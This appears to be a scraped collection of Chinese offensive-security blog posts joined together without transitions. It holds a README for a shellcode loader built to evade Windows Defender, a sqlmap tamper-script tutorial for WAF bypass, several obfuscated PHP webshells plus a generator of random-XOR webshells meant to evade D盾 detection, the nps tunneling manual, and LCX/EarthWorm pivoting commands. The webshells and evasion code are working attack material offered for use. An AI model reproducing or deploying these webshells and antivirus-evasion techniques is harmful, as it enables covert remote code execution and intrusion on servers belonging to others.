https://github.com/Y4er/shellcode-loader

shellcode loader

csharp 5632 byte xor 静态免杀,过Windows defender.

免杀效果

测试于 2020/2/24 23:30

http://r.virscan.org/language/zh-cn/report/5583273543afd24b387833e86c22a798 0/49

https://www.virustotal.com/gui/file/08d02c54c910ad9d26d4f42aa59f785aad9468c3687be4d2b3575c689c18102c/detection 2/69

使用方法

cobalt strike 或者 metasploit 生成 csharp 的 payload ,先使用 enloader 加密,再使用 loader.exe 执行.

注意不同位数的 payload 请使用相应的 loader
注意不同位数的 payload 请使用相应的 loader
注意不同位数的 payload 请使用相应的 loader
注意不同位数的 payload 请使用相应的 loader
编译时请注意针对目标机器的.net版本对应编译
编译时请注意针对目标机器的.net版本对应编译
编译时请注意针对目标机器的.net版本对应编译
编译时请注意针对目标机器的.net版本对应编译

1. enloader.exe 生成加密payload
2. cmd /c loader.exe payload

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

sqlmap的--tamper参数可以引入用户自定义的脚本来修改注入时的payload，由此可以使用tamper来绕过waf，替换被过滤的关键字等。这是一个基本的tamper结构

#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW # 当前脚本调用优先等级

def dependencies(): # 声明当前脚本适用/不适用的范围，可以为空。
    pass

def tamper(payload, **kwargs): # 用于篡改Payload、以及请求头的主要函数
    return payload

需要把他保存为 my.py 放入 sqlmaptamper 路径下，然后使用的时候加上参数 --tamper=my 就行了

简单分析

拿官方的一个tamper来分析下结构

#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import random

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def randomIP():
    numbers = []

    while not numbers or numbers[0] in (10, 172, 192):
        numbers = random.sample(xrange(1, 255), 4)

    return '.'.join(str(_) for _ in numbers)

def tamper(payload, **kwargs):
    """
    Append a fake HTTP header 'X-Forwarded-For'
    """

    headers = kwargs.get("headers", {})
    headers["X-Forwarded-For"] = randomIP()
    headers["X-Client-Ip"] = randomIP()
    headers["X-Real-Ip"] = randomIP()
    return payload

分为了import部分、__priority__ 属性、dependencies函数、tamper函数以及用户自定义的函数

import

这一部分我们可以导入sqlmap的内部库，sqlmap为我们提供了很多封装好的函数和数据类型，比如下文的PRIORITY就来源于sqlmap/lib/core/enums.py

PRIORITY

PRIORITY是定义tamper的优先级，PRIORITY有以下几个参数:
– LOWEST = -100
– LOWER = -50
– LOW = -10
– NORMAL = 0
– HIGH = 10
– HIGHER = 50
– HIGHEST = 100
如果使用者使用了多个tamper，sqlmap就会根据每个tamper定义PRIORITY的参数等级来优先使用等级较高的tamper，如果你有两个tamper需要同时用，需要注意这个问题。

dependencies

dependencies主要是提示用户，这个tamper支持哪些数据库，具体代码如下:

#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS

__priority__ = PRIORITY.NORMAL

def dependencies():
    singleTimeWarnMessage("这是我的tamper提示")

def tamper(payload, **kwargs):
    return payload

DBMS.MYSQL这个参数代表的是Mysql，其他数据库的参数也可以看这个sqlmaplibcoreenums.py

Tamper

tamper这个函数是tamper最重要的函数，你要实现的功能，全部写在这个函数里。payload这个参数就是sqlmap的原始注入payload，我们要实现绕过，一般就是针对这个payload的修改。kwargs是针对http头部的修改，如果你bypass，是通过修改http头，就需要用到这个

基于payload

先来基于修改payload来绕过替换关键字，我使用sqlilab的第一关，并且修改了部分代码来把恶意关键字替换为空来避免联合查询，如图

编写tamper来双写绕过

def tamper(payload, **kwargs):
    payload = payload.lower()
    payload = payload.replace('select','seleselectct')
    payload = payload.replace('union','ununionion')
    return payload

没有使用tamper之前，我们加上--tech=U来让sqlmap只测试联合查询注入，--flush-session意思是每次刷新会话，清理上次的缓存。

sqlmap -u http://php.local/Less-1/?id=1 --tech=U --flush-session --proxy=http://127.0.0.1:8080/ --random-agent --dbms=mysql

从burp的流量中看到payload是没有双写的，必然会注入失败。而使用了tamper之后

sqlmap -u http://php.local/Less-1/?id=1 --tech=U --flush-session --proxy=http://127.0.0.1:8080/ --random-agent --tamper=my --dbms=mysql

payload正常双写，可以注入

基于http头

我们使用sqlmaptamperxforwardedfor.py的tamper来讲解

def tamper(payload, **kwargs):
    """
    Append a fake HTTP header 'X-Forwarded-For'
    """

    headers = kwargs.get("headers", {})
    headers["X-Forwarded-For"] = randomIP()
    headers["X-Client-Ip"] = randomIP()
    headers["X-Real-Ip"] = randomIP()
    return payload

从kwargs中取出headers数组，然后修改了xff值达到随机IP的效果，不再赘述。

总结

本文简单介绍了tamper的编写，并使用双写做了实例演示，在实际的渗透测试中，我们需要针对不同的waf来编写不同的tamper来灵活使用。

2019-08-12

2019-08-09

疯狂免杀

2019-08-07

<?php
function a()
{
    return '' + @$_POST['a'];
}

eval(a());

再来一个三元表达式的

2019-08-06

常量过D盾

https://secquan.org/Notes/1069997

<?php
sprintf("123");
sprintf("123");
sprintf("123");
$a=$_GET['a'];
define("Test", "$a",true);
assert(TesT);
?>

另一种思路反序列化过D盾，代码自己写

再一种思路 创建对象重复定义变量成员过D盾

2019-05-30

ASCII码显示不出来的字符做变量过D盾

https://github.com/th1k404/unishell

http://ascii.911cha.com/

<?php
if($_GET['␄']){
    $␄=$_GET['␄'];
    @preg_replace("/abcde/e",$␄, "abcdefg");
}
?>

可以自己修改

2019-05-21

https://github.com/yzddmr6/webshell-venom

利用随机异或无限免杀d盾

蚁剑插件版请移步:

https://github.com/yzddmr6/as_webshell_venom

<?php
//code by Mr6
error_reporting(0);
    function randomkeys($length)   
{   
   $pattern = '`~-=!@#$%^&*_/+?<>{}|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';  
    for($i=0;$i<$length;$i++)   
    {   
        $key[$i]= $pattern{mt_rand(0,strlen($pattern)-1)};    //生成php随机数   
    }   
    return $key;   
}   
    function randname($length)   
{   
   $pattern = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';  
    for($i=0;$i<$length;$i++)   
    {   
        @$key.= $pattern{mt_rand(0,strlen($pattern)-1)};    //生成php随机数   
    }   
    return $key;   
} 
    $str=randomkeys(6); 
    $bname=randname(4);
    $lname=strrev(strtolower($bname));
    $str2="assert";
            echo "<?php n";
            echo "header('HTTP/1.1 404');n";
            echo "class  ".$bname."{ public $c='';nfunction __destruct(){n";
    for ($i=0;$i<6;$i++)
    {
        $name="_".$i;
        $str3[$i]=bin2hex($str[$i] ^$str2[$i]);
        echo "$"."$name=";
    echo "'".$str[$i]."'"."^".""\x".$str3[$i]."";n";
    }
    $aa='$db=$_0.$_1.$_2.$_3.$_4.$_5;';
    echo $aa;
    echo "n";
    echo '@$db ("$this->c");}}';
    echo "n";
    echo "${$lname}=new {$bname}();n";
    echo "@${$lname}->c=$_POST['Mr6'];n";
    echo "?>n";
    @$file=$_GET['file'];
    $html = ob_get_contents();
    if (isset($file)){
    if(file_put_contents($file,$html))
    echo "nnn".$file."   save success!";}
    else {echo "Please input the file name like '?file=xxx.txt'";}
    ?>

2019-05-11

<?php
function a(){
    return $a=$_POST['1'];
}
@assert(a());
?>

<?php
$value=$key = "a";
foreach($_POST as $key=>$value){
    assert($value);
}

<?php
$x='$_PO'."STasdasd[".'1]';
$x = $x.str_replace('STasdasd',"ST[");

for ($x=0; $x<=0; $x++) {
    assert("$x");
}

可以发现的规律是当已经定义的变量和循环的变量名一致时，D盾就不是那么敏感了

nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发，可支持任何tcp、udp上层协议（访问内网网站、本地支付接口调试、ssh访问、远程桌面，内网dns解析等等……），此外还支持内网http代理、内网socks5代理、p2p等，并带有功能强大的web管理端。

背景

1. 做微信公众号开发、小程序开发等—-> 域名代理模式

2. 想在外网通过ssh连接内网的机器，做云服务器到内网服务器端口的映射，—-> tcp代理模式

3. 在非内网环境下使用内网dns，或者需要通过udp访问内网机器等—-> udp代理模式

4. 在外网使用HTTP代理访问内网站点—-> http代理模式

5. 搭建一个内网穿透ss，在外网如同使用内网vpn一样访问内网资源或者设备—-> socks5代理模式

安装

releases安装

releases

下载对应的系统版本即可，服务端和客户端是单独的

源码安装

• 安装源码
  > go get -u github.com/cnlh/nps…
• 编译
  > go build cmd/nps/nps.go

go build cmd/npc/npc.go

使用示例

统一准备工作（必做）

• 开启服务端，假设公网服务器ip为1.1.1.1，配置文件中bridge_port为8284，配置文件中web_port为8080
• 访问1.1.1.1:8080
• 在客户端管理中创建一个客户端，记录下验证密钥
• 内网客户端运行（windows使用cmd运行加.exe）

./npc -server=1.1.1.1:8284 -vkey=客户端的密钥

域名解析

适用范围： 小程序开发、微信公众号开发、产品演示

假设场景：
– 有一个域名proxy.com，有一台公网机器ip为1.1.1.1
– 两个内网开发站点127.0.0.1:81，127.0.0.1:82
– 想通过（http|https://）a.proxy.com访问127.0.0.1:81，通过（http|https://）b.proxy.com访问127.0.0.1:82

使用步骤
– 将*.proxy.com解析到公网服务器1.1.1.1
– 点击刚才创建的客户端的域名管理，添加两条规则规则：1、域名：a.proxy.com，内网目标：127.0.0.1:81，2、域名：b.proxy.com，内网目标：127.0.0.1:82

现在访问（http|https://）/a.proxy.com，b.proxy.com即可成功

https: 如需使用https请进行相关配置，详见 使用https

tcp隧道

适用范围： ssh、远程桌面等tcp连接场景

假设场景：
想通过访问公网服务器1.1.1.1的8001端口，连接内网机器10.1.50.101的22端口，实现ssh连接

使用步骤
– 在刚才创建的客户端隧道管理中添加一条tcp隧道，填写监听的端口（8001）、内网目标ip和目标端口（10.1.50.101:22），保存。
– 访问公网服务器ip（1.1.1.1）,填写的监听端口(8001)，相当于访问内网ip(10.1.50.101):目标端口(22)，例如：ssh -p 8001 root@1.1.1.1

udp隧道

适用范围： 内网dns解析等udp连接场景

假设场景：
内网有一台dns（10.1.50.102:53），在非内网环境下想使用该dns，公网服务器为1.1.1.1

使用步骤
– 在刚才创建的客户端的隧道管理中添加一条udp隧道，填写监听的端口（53）、内网目标ip和目标端口（10.1.50.102:53），保存。
– 修改需要使用的内网dns为127.0.0.1，则相当于使用10.1.50.202作为dns服务器

socks5代理

适用范围： 在外网环境下如同使用vpn一样访问内网设备或者资源

假设场景：
想将公网服务器1.1.1.1的8003端口作为socks5代理，达到访问内网任意设备或者资源的效果

使用步骤
– 在刚才创建的客户端隧道管理中添加一条socks5代理，填写监听的端口（8003），保存。
– 在外网环境的本机配置socks5代理(例如使用proxifier进行全局代理)，ip为公网服务器ip（1.1.1.1），端口为填写的监听端口(8003)，即可畅享内网了

http正向代理

适用范围： 在外网环境下使用http正向代理访问内网站点

假设场景：
想将公网服务器1.1.1.1的8004端口作为http代理，访问内网网站

使用步骤

• 在刚才创建的客户端隧道管理中添加一条http代理，填写监听的端口（8004），保存。
• 在外网环境的本机配置http代理，ip为公网服务器ip（1.1.1.1），端口为填写的监听端口(8004)，即可访问了

私密代理

适用范围： 无需占用多余的端口、安全性要求较高可以防止其他人连接的tcp服务，例如ssh。

假设场景：
无需新增多的端口实现访问内网服务器10.1.50.2的22端口

使用步骤
– 在刚才创建的客户端中添加一条私密代理，并设置唯一密钥secrettest和内网目标10.1.50.2:22
– 在需要连接ssh的机器上以执行命令

./npc -server=1.1.1.1:8284 -vkey=vkey -type=tcp -password=secrettest -local_type=secret

如需指定本地端口可加参数-local_port=xx，默认为2000

注意： password为web管理上添加的唯一密钥，具体命令可查看web管理上的命令提示

假设10.1.50.2用户名为root，现在执行ssh -p 2000 root@1.1.1.1即可访问ssh

p2p服务

适用范围： 大流量传输场景，流量不经过公网服务器，但是由于p2p穿透和nat类型关系较大，不保证100%成功，支持大部分nat类型。nat类型检测

假设场景：
内网1机器ip为10.1.50.2 内网2机器2 ip为10.2.50.2

想通过访问内网1机器1的2000端口—->访问到内网2机器3 10.2.50.3的22端口

使用步骤
– 在nps.conf中设置p2p_ip（nps服务器ip）和p2p_port（nps服务器udp端口）
– 在刚才刚才创建的客户端中添加一条p2p代理，并设置唯一密钥p2pssh
– 在机器1执行命令

./npc -server=1.1.1.1:8284 -vkey=123 -password=p2pssh -target=10.2.50.3:22

如需指定本地端口可加参数-local_port=xx，默认为2000

注意： password为web管理上添加的唯一密钥，具体命令可查看web管理上的命令提示

假设机器3用户名为root，现在在机器1上执行ssh -p 2000 root@127.0.0.1即可访问机器2的ssh

web管理

介绍

可在网页上配置和管理各个tcp、udp隧道、内网站点代理，http、https解析等，功能强大，操作方便。

提示：使用web模式时，服务端执行文件必须在项目根目录，否则无法正确加载配置文件

启动

服务端测试

 ./nps test

如有错误请及时修改配置文件，无错误可继续进行下去

服务端启动

 ./nps start

如果无需daemon运行或者打开后无法正常访问web管理，去掉start查看日志运行即可

web管理

进入web界面，公网ip:web界面端口（默认8080），密码默认为123

进入web管理界面，有详细的说明

服务端配置文件重载

如果是daemon启动

 ./nps reload

说明： 仅支持部分配置重载，例如allow_user_login auth_crypt_key auth_key web_username web_password 等，未来将支持更多

服务端停止或重启

如果是daemon启动

 ./nps stop|restart

服务端配置文件

• /conf/nps.conf

使用https

方式一： 类似于nginx实现https的处理

在配置文件中将https_proxy_port设置为443或者其他你想配置的端口，和在web中对应域名编辑中设置对应的证书路径，将https_just_proxy设置为false，然后就和http代理一样了

此外： 可以在nps.conf中设置一个默认的https配置，当遇到未在web中设置https证书的域名解析时，将自动使用默认证书，另还有一种情况就是对于某些请求的clienthello不携带sni扩展信息，nps也将自动使用默认证书

方式二： 在内网对应服务器上设置https

在nps.conf中将https_just_proxy设置为true，并且打开https_proxy_port端口，然后nps将直接转发https请求到内网服务器上，由内网服务器进行https处理

与nginx配合

有时候我们还需要在云服务器上运行nginx来保证静态文件缓存等，本代理可和nginx配合使用，在配置文件中将httpProxyPort设置为非80端口，并在nginx中配置代理，例如httpProxyPort为8024时

server {
    listen 80;
    server_name *.proxy.com;
    location / {
        proxy_set_header Host  $http_host;
        proxy_pass http://127.0.0.1:8024;/
    }
}

如需使用https也可在nginx监听443端口并配置ssl，并将本代理的httpsProxyPort设置为空关闭https即可，例如httpProxyPort为8024时

server {
    listen 443;
    server_name *.proxy.com;
    ssl on;
    ssl_certificate  certificate.crt;
    ssl_certificate_key private.key;
    ssl_session_timeout 5m;
    ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE:ECDH:AES:HIGH:!NULL:!aNULL:!MD5:!ADH:!RC4;
    ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
    ssl_prefer_server_ciphers on;
    location / {
        proxy_set_header Host  $http_host;
        proxy_pass http://127.0.0.1:8024;/
    }
}

关闭代理

如需关闭http代理可在配置文件中将http_proxy_port设置为空，如需关闭https代理可在配置文件中将https_proxy_port设置为空。

将nps安装到系统

如果需要长期并且方便的运行nps服务端，可将nps安装到操作系统中，可执行命令

(./nps|nps.exe) install

安装成功后，对于linux，darwin，将会把配置文件和静态文件放置于/etc/nps/，并将可执行文件nps复制到/usr/bin/nps或者/usr/local/bin/nps，安装成功后可在任何位置执行

nps test|start|stop|restart|status

对于windows系统，将会把配置文件和静态文件放置于C:\Program Files\nps，安装成功后可将可执行文件nps.exe复制到任何位置执行

nps.exe test|start|stop|restart|status

流量数据持久化

服务端支持将流量数据持久化，默认情况下是关闭的，如果有需求可以设置nps.conf中的flow_store_interval参数，单位为分钟

注意： nps不会持久化通过公钥连接的客户端

系统信息显示

nps服务端支持在web上显示和统计服务器的相关信息，但默认一些统计图表是关闭的，如需开启请在nps.conf中设置system_info_display=true

自定义客户端连接密钥

web上可以自定义客户端连接的密钥，但是必须具有唯一性

关闭公钥访问

可以将nps.conf中的public_vkey设置为空或者删除

关闭web管理

可以将nps.conf中的web_port设置为空或者删除

服务端多用户登陆

如果将nps.conf中的allow_user_login设置为true,服务端web将支持多用户登陆，登陆用户名为user，默认密码为每个客户端的验证密钥，登陆后可以进入客户端编辑修改web登陆的用户名和密码，默认该功能是关闭的。

用户注册功能

nps服务端支持用户注册功能，可将nps.conf中的allow_user_register设置为true，开启后登陆页将会有有注册功能，

监听指定ip

nps支持每个隧道监听不同的服务端端口,在nps.conf中设置allow_multi_ip=true后，可在web中控制，或者npc配置文件中(可忽略，默认为0.0.0.0)

server_ip=xxx

代理到服务端本地

在使用nps监听80或者443端口时，默认是将所有的请求都会转发到内网上，但有时候我们的nps服务器的上一些服务也需要使用这两个端口，nps提供类似于nginx proxy_pass 的功能，支持将代理到服务器本地，该功能支持域名解析，tcp、udp隧道，默认关闭。

即： 假设在nps的vps服务器上有一个服务使用5000端口，这时候nps占用了80端口和443，我们想能使用一个域名通过http(s)访问到5000的服务。

使用方式： 在nps.conf中设置allow_local_proxy=true，然后在web上设置想转发的隧道或者域名然后选择转发到本地选项即可成功。

客户端

客户端启动

无配置文件模式

此模式的各种配置在服务端web管理中完成,客户端除运行一条命令外无需任何其他设置

 ./npc -server=ip:port -vkey=web界面中显示的密钥

配置文件模式

此模式使用nps的公钥或者客户端私钥验证，各种配置在客户端完成，同时服务端web也可以进行管理

 ./npc -config=npc配置文件路径

配置文件说明

示例配置文件

全局配置

[common]
server_addr=1.1.1.1:8284
conn_type=tcp
vkey=123
username=111
password=222
compress=true
crypt=true
rate_limit=10000
flow_limit=100
remark=test
max_conn=10

域名代理

[common]
server_addr=1.1.1.1:8284
vkey=123
[web1]
host=a.proxy.com
target_addr=127.0.0.1:8080,127.0.0.1:8082
host_change=www.proxy.com
header_set_proxy=nps

tcp隧道模式

[common]
server_addr=1.1.1.1:8284
vkey=123
[tcp]
mode=tcp
target_addr=127.0.0.1:8080
server_port=9001

udp隧道模式

[common]
server_addr=1.1.1.1:8284
vkey=123
[udp]
mode=udp
target_addr=127.0.0.1:8080
server_port=9002

http代理模式

[common]
server_addr=1.1.1.1:8284
vkey=123
[http]
mode=httpProxy
server_port=9003

socks5代理模式

[common]
server_addr=1.1.1.1:8284
vkey=123
[socks5]
mode=socks5
server_port=9004

私密代理模式

[common]
server_addr=1.1.1.1:8284
vkey=123
[secret_ssh]
mode=secret
password=ssh2
target_addr=10.1.50.2:22

p2p代理模式

[common]
server_addr=1.1.1.1:8284
vkey=123
[p2p_ssh]
mode=p2p
password=ssh2
target_addr=10.1.50.2:22

文件访问模式

利用nps提供一个公网可访问的本地文件服务，此模式仅客户端使用配置文件模式方可启动

[common]
server_addr=1.1.1.1:8284
vkey=123
[file]
mode=file
server_port=9100
local_path=/tmp/
strip_pre=/web/
````

项 | 含义
---|---
mode | file
server_port | 服务端开启的端口
local_path|本地文件目录
strip_pre|前缀

对于`strip_pre`，访问公网`ip:9100/web/`相当于访问`/tmp/`目录

#### 断线重连
```ini
[common]
auto_reconnection=true

nat类型检测

 ./npc nat

如果p2p双方都是Symmetic Nat，肯定不能成功，其他组合都有较大成功率。

状态检查

 ./npc status -config=npc配置文件路径

重载配置文件

 ./npc restart -config=npc配置文件路径

通过代理连接nps

有时候运行npc的内网机器无法直接访问外网，此时可以可以通过socks5代理连接nps

对于配置文件方式启动,设置

[common]
proxy_url=socks5://111:222@127.0.0.1:8024

对于无配置文件模式,加上参数

-proxy=socks5://111:222@127.0.0.1:8024

支持socks5和http两种模式

即socks5://username:password@ip:port

或

群晖支持

可在releases中下载spk群晖套件，例如npc_x64-6.1_0.19.0-1.spk

相关功能

缓存支持

对于web站点来说，一些静态文件往往消耗更大的流量，且在内网穿透中，静态文件还需到客户端获取一次，这将导致更大的流量消耗。nps在域名解析代理中支持对静态文件进行缓存。

即假设一个站点有a.css，nps将只需从npc客户端读取一次该文件，然后把该文件的内容放在内存中，下一次将不再对npc客户端进行请求而直接返回内存中的对应内容。该功能默认是关闭的，如需开启请在nps.conf中设置http_cache=true，并设置http_cache_length（缓存文件的个数，消耗内存，不宜过大，0表示不限制个数）

数据压缩支持

由于是内网穿透，内网客户端与服务端之间的隧道存在大量的数据交换，为节省流量，加快传输速度，由此本程序支持SNNAPY形式的压缩。

• 所有模式均支持数据压缩
• 在web管理或客户端配置文件中设置

加密传输

如果公司内网防火墙对外网访问进行了流量识别与屏蔽，例如禁止了ssh协议等，通过设置 配置文件，将服务端与客户端之间的通信内容加密传输，将会有效防止流量被拦截。
– nps使用tls加密，所以一定要保留conf目录下的密钥文件，同时也可以自行生成
– 在web管理或客户端配置文件中设置

站点保护

域名代理模式所有客户端共用一个http服务端口，在知道域名后任何人都可访问，一些开发或者测试环境需要保密，所以可以设置用户名和密码，nps将通过 Http Basic Auth 来保护，访问时需要输入正确的用户名和密码。

• 在web管理或客户端配置文件中设置

host修改

由于内网站点需要的host可能与公网域名不一致，域名代理支持host修改功能，即修改request的header中的host字段。

使用方法：在web管理中设置

自定义header

支持对header进行新增或者修改，以配合服务的需要

404页面配置

支持域名解析模式的自定义404页面，修改/web/static/page/error.html中内容即可，暂不支持静态文件等内容

流量限制

支持客户端级流量限制，当该客户端入口流量与出口流量达到设定的总量后会拒绝服务
，域名代理会返回404页面，其他代理会拒绝连接,使用该功能需要在nps.conf中设置allow_flow_limit，默认是关闭的。

带宽限制

支持客户端级带宽限制，带宽计算方式为入口和出口总和，权重均衡,使用该功能需要在nps.conf中设置allow_rate_limit，默认是关闭的。

负载均衡

本代理支持域名解析模式和tcp代理的负载均衡，在web域名添加或者编辑中内网目标分行填写多个目标即可实现轮训级别的负载均衡

端口白名单

为了防止服务端上的端口被滥用，可在nps.conf中配置allow_ports限制可开启的端口，忽略或者不填表示端口不受限制，格式：

allow_ports=9001-9009,10001,11000-12000

端口范围映射

当客户端以配置文件的方式启动时，可以将本地的端口进行范围映射，仅支持tcp和udp模式，例如：

[tcp]
mode=tcp
server_port=9001-9009,10001,11000-12000
target_port=8001-8009,10002,13000-14000

逗号分隔，可单个或者范围，注意上下端口的对应关系，无法一一对应将不能成功

端口范围映射到其他机器

[tcp]
mode=tcp
server_port=9001-9009,10001,11000-12000
target_port=8001-8009,10002,13000-14000
target_ip=10.1.50.2

填写target_ip后则表示映射的该地址机器的端口，忽略则便是映射本地127.0.0.1,仅范围映射时有效

守护进程

本代理支持守护进程，使用示例如下，服务端客户端所有模式通用,支持linux，darwin，windows。

./(nps|npc) start|stop|restart|status 若有其他参数可加其他参数

(nps|npc).exe start|stop|restart|status 若有其他参数可加其他参数

KCP协议支持

KCP 是一个快速可靠协议，能以比 TCP浪费10%-20%的带宽的代价，换取平均延迟降低 30%-40%，在弱网环境下对性能能有一定的提升。可在nps.conf中修改bridge_type为kcp
，设置后本代理将开启udp端口（bridge_port）

注意：当服务端为kcp时，客户端连接时也需要使用相同配置，无配置文件模式加上参数type=kcp,配置文件模式在配置文件中设置tp=kcp

域名泛解析

支持域名泛解析，例如将host设置为*.proxy.com，a.proxy.com、b.proxy.com等都将解析到同一目标，在web管理中或客户端配置文件中将host设置为此格式即可。

URL路由

本代理支持根据URL将同一域名转发到不同的内网服务器，可在web中或客户端配置文件中设置，此参数也可忽略，例如在客户端配置文件中

[web1]
host=a.proxy.com
target_addr=127.0.0.1:7001
location=/test
[web2]
host=a.proxy.com
target_addr=127.0.0.1:7002
location=/static

对于a.proxy.com/test将转发到web1，对于a.proxy.com/static将转发到web2

限制ip访问

如果将一些危险性高的端口例如ssh端口暴露在公网上，可能会带来一些风险，本代理支持限制ip访问。

使用方法: 在配置文件nps.conf中设置ip_limit=true，设置后仅通过注册的ip方可访问。

ip注册：

方式一：
在需要访问的机器上，运行客户端

./npc register -server=ip:port -vkey=公钥或客户端密钥 time=2

time为有效小时数，例如time=2，在当前时间后的两小时内，本机公网ip都可以访问nps代理.

方式二：
此外nps的web登陆也可提供验证的功能，成功登陆nps web admin后将自动为登陆的ip注册两小时的允许访问权限。

注意： 本机公网ip并不是一成不变的，请自行注意有效期的设置，同时同一网络下，多人也可能是在公用同一个公网ip。

客户端最大连接数

为防止恶意大量长连接，影响服务端程序的稳定性，可以在web或客户端配置文件中为每个客户端设置最大连接数。该功能针对socks5、http正向代理、域名代理、tcp代理、udp代理、私密代理生效,使用该功能需要在nps.conf中设置allow_connection_num_limit=true，默认是关闭的。

客户端最大隧道数限制

nps支持对客户端的隧道数量进行限制，该功能默认是关闭的，如需开启，请在nps.conf中设置allow_tunnel_num_limit=true。

端口复用

在一些严格的网络环境中，对端口的个数等限制较大，nps支持强大端口复用功能。将bridge_port、 http_proxy_port、 https_proxy_port 、web_port都设置为同一端口，也能正常使用。

• 使用时将需要复用的端口设置为与bridge_port一致即可，将自动识别。
• 如需将web管理的端口也复用，需要配置web_host也就是一个二级域名以便区分

多路复用

nps主要通信默认基于多路复用，无需开启。

环境变量渲染

npc支持环境变量渲染以适应在某些特殊场景下的要求。

在无配置文件启动模式下：
设置环境变量

export NPC_SERVER_ADDR=1.1.1.1:8284
export NPC_SERVER_VKEY=xxxxx

直接执行./npc即可运行

在配置文件启动模式下：

[common]
server_addr={{.NPC_SERVER_ADDR}}
conn_type=tcp
vkey={{.NPC_SERVER_VKEY}}
auto_reconnection=true
[web]
host={{.NPC_WEB_HOST}}
target_addr={{.NPC_WEB_TARGET}}

在配置文件中填入相应的环境变量名称，npc将自动进行渲染配置文件替换环境变量

健康检查

当客户端以配置文件模式启动时，支持多节点的健康检查。配置示例如下

[health_check_test1]
health_check_timeout=1
health_check_max_failed=3
health_check_interval=1
health_http_url=/
health_check_type=http
health_check_target=127.0.0.1:8083,127.0.0.1:8082

[health_check_test2]
health_check_timeout=1
health_check_max_failed=3
health_check_interval=1
health_check_type=tcp
health_check_target=127.0.0.1:8083,127.0.0.1:8082

health关键词必须在开头存在

第一种是http模式，也就是以get的方式请求目标+url，返回状态码为200表示成功

第一种是tcp模式，也就是以tcp的方式与目标建立连接，能成功建立连接表示成功

如果失败次数超过health_check_max_failed，nps则会移除该npc下的所有该目标，如果失败后目标重新上线，nps将自动将目标重新加入。

日志输出

日志输出级别

对于npc：

-log_level=0~7 -log_path=npc.log

LevelEmergency->0  LevelAlert->1

LevelCritical->2 LevelError->3

LevelWarning->4 LevelNotice->5

LevelInformational->6 LevelDebug->7

默认为全输出,级别为0到7

对于nps：

在nps.conf中设置相关配置即可

相关说明

获取用户真实ip

在域名代理模式中，可以通过request请求 header 中的 X-Forwarded-For 和 X-Real-IP 来获取用户真实 IP。

本代理前会在每一个http(s)请求中添加了这两个 header。

热更新支持

对于绝大多数配置，在web管理中的修改将实时使用，无需重启客户端或者服务端

客户端地址显示

在web管理中将显示客户端的连接地址

流量统计

可统计显示每个代理使用的流量，由于压缩和加密等原因，会和实际环境中的略有差异

当前客户端带宽

可统计每个客户端当前的带宽，可能和实际有一定差异，仅供参考。

客户端与服务端版本对比

为了程序正常运行，客户端与服务端的核心版本必须一致，否则将导致客户端无法成功连接致服务端。

webAPI

webAPI验证说明

• 采用auth_key的验证方式
• 在提交的每个请求后面附带两个参数，auth_key 和timestamp

auth_key的生成方式为：md5(配置文件中的auth_key+当前时间戳)

timestamp为当前时间戳

curl --request POST \
  --url http://127.0.0.1:8080/client/list \
  --data 'auth_key=2a0000d9229e7dbcf79dd0f5e04bb084&timestamp=1553045344&start=0&limit=10'

注意： 为保证安全，时间戳的有效范围为20秒内，所以每次提交请求必须重新生成。

获取服务端时间

由于服务端与api请求的客户端时间差异不能太大，所以提供了一个可以获取服务端时间的接口

POST /auth/gettime

获取服务端authKey

如果想获取authKey，服务端提供获取authKey的接口

POST /auth/getauthkey

将返回加密后的authKey，采用aes cbc加密，请使用与服务端配置文件中cryptKey相同的密钥进行解密

注意： nps配置文件中auth_crypt_key需为16位
– 解密密钥长度128
– 偏移量与密钥相同
– 补码方式pkcs5padding
– 解密串编码方式 十六进制

详细文档

• 此文档近期可能更新较慢，建议自行抓包

为方便第三方扩展，在web模式下可利用webAPI进行相关操作，详情见
webAPI文档

本文主要介绍几种内网中常用的端口转发以代理的几种姿势。阅读本文前请看到每个阶段的网络环境，对理解本文有重要帮助。

我们在这里用三台实验机

client ：172.16.1.1

attacker：172.16.2.18 172.16.1.144

server：172.16.2.8

我们的目的是从我们的client就可以连接上 win2008 的远程桌面。

LCX

lcx.exe有两大功能

1. 端口转发 slave和listen成对使用
2. 端口映射 tran

slave listen

server执行

lcx.exe -s 172.16.2.8 5555 127.0.0.1 3389

这句话的意思是把本机的3389端口转发到172.16.2.8的5555端口

在attacker执行

lcx.exe -l 5555 4444

这句是把本机5555接收到的数据转发到本机的4444端口

现在就可以在client上 mstsc 连接attacker的4444端口，或者直接在attacker中连接127.0.0.1:4444

整个数据的流向

client <-> 4444 attacker 5555 <->3389 server

tran

如果server中有防火墙不允许3389出站，那么可以用tran将3389映射到防火墙允许出站的端口，比如53端口。

server执行

lcx -t 53 172.16.2.8 3389

直接连接server:53

数据流向

server 3389 <-> 53 <->client

Earthworm

EW 是一套便携式的网络穿透工具，具有 SOCKS v5 服务架设和端口转发两大核心功能。该工具能够以 “正向”、“反向”、“多级级联” 等方式打通一条网络隧道，直达网络深处，用蚯蚓独有的手段突破网络限制，给防火墙松土。工具包中提供了多种可执行文件，以适用不同的操作系统，Linux、Windows、MacOS、Arm-Linux 均被包括其内, 强烈推荐使用。官方地址：http://rootkiter.com/EarthWorm

该工具共有 6 种命令格式：ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran

正向socks5

attacker:

ew -s ssocksd -l 1080

client:

C:\Users\Y4er>curl http://172.16.2.8/ -x socks5://172.16.1.144:1080
I am 172.16.2.8

数据流向

client <-> attacker 1080 <-> server

